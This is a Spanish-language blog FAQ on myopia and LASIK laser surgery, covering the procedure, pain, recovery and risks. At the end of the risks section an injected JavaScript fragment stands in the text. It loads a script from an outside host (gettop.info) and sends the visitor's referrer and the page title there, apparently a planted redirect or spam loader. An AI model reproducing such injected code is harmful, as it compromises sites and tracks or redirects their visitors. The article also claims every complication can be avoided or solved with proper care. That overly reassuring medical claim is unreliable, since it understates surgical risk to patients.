Salud y belleza » Cirugía estética, Salud

Preguntas frecuentes sobre miopía y cirugía láser (II)

Sin Comentarios

Continuamos con el repaso en torno a las preguntas habituales de los pacientes que, por problemas de miopía, deben someterse a una intervención con láser

¿Cómo se desarrolla la operación con láser?

Existen varias técnicas pero, de entre todas, la más utilizada es aquella que recibe el nombre de LASIK. Con respecto al desarrollo de la intervención: ante todo, naturalmente se realiza una revisión y comprobación de los datos antes de la operación para asegurarse que, luego, no sucedan sorpresas. Ahora sí, la intervención arranca con la aplicación del factor anestésico y la posterior inmovilización del ojo del paciente (con esto se busca cortar el parpadeo momentáneamente). Una vez arregladas estas circunstancias, el profesional a cargo procede a levantar una pequeña capa de tejido corneal quedando, de esa forma, libre la zona donde va a actuar el láser. Luego, se aplica el láser por un lapso que puede ir de uno a cuatro minutos y, finalmente, se recoloca la capa de tejido corneal en su forma habitual: esta cicatriza en unos minutos, sin necesidad de aplicar ninguna clase de puntos.

¿Qué hay acerca de los mitos sobre movimientos durante la operación?

No hay razón para preocuparse: actualmente, todos los equipos de láser cuentan con un sistema de seguimiento ocular, es decir, de rastreo por lo tanto nada sucede con movimientos leves, involuntarios. De ocurrir ello, el haz del láser se recoloca constantemente a la posición que tenga el ojo en el momento del disparo y, de ninguna manera, afecta o la operación o el físico del paciente. Atrás quedaron esas épocas…

¿Es una operación dolorosa?

Para nada: al aplicarse anestesia antes de la operación, ningún tipo de dolor puede percatarse. Sí existen lógicas molestias o comezón, pero nada de que preocuparse.

¿Cómo es el post-operatorio?

Finalizada completamente la intervención por miopía, el paciente deberá permanecer en reposo por un lapso de casi media hora (tiempo en el cual los oftalmólogos harán la primera revisión). Pasados esos treinta minutos, el paciente ya se encuentra en condiciones de abandonar la clínica por sus propios medios y, mejor aún, con una visión del ochenta por ciento. Con respecto a las horas subsiguientes, solo es necesario mantener reposo y llevar a cabo ciertos cuidados pero, en cuestión de días, todo vuelve a la normalidad.

¿Qué riesgos representa la operación con láser?

Al día de hoy, el riesgo ha sido considerablemente reducido. Aun así, entre las posibles complicaciones del tratamiento por miopía se pueden mencionar: aparición de halos (destellos nocturnos), alteraciones en la lámina cornela o dificultades en la cicatrización: debido a la respuesta individual en la cicatrización. Naturalmente, con el cuidado adecuado y de la mano del profesional correcto, todo esto puede evitarse o solucionarse.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.